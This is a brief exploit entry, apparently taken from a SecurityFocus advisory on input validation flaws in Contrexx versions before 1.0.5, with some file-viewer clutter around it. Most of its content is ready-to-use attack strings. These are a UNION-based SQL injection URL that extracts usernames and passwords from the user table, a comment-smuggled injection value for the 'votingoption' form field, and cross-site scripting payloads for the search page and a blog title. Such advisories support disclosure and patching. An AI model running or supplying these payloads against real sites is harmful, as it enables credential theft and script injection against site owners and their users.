13 lines
No EOL
679 B
Text
13 lines
No EOL
679 B
Text
source: https://www.securityfocus.com/bid/14352/info
|
|
|
|
Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.
|
|
|
|
Contrexx versions prior to 1.0.5 are affected.
|
|
|
|
supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.
|
|
|
|
/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users
|
|
|
|
/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E
|
|
|
|
Create a blog entry with the title <script>alert('xss')</script> |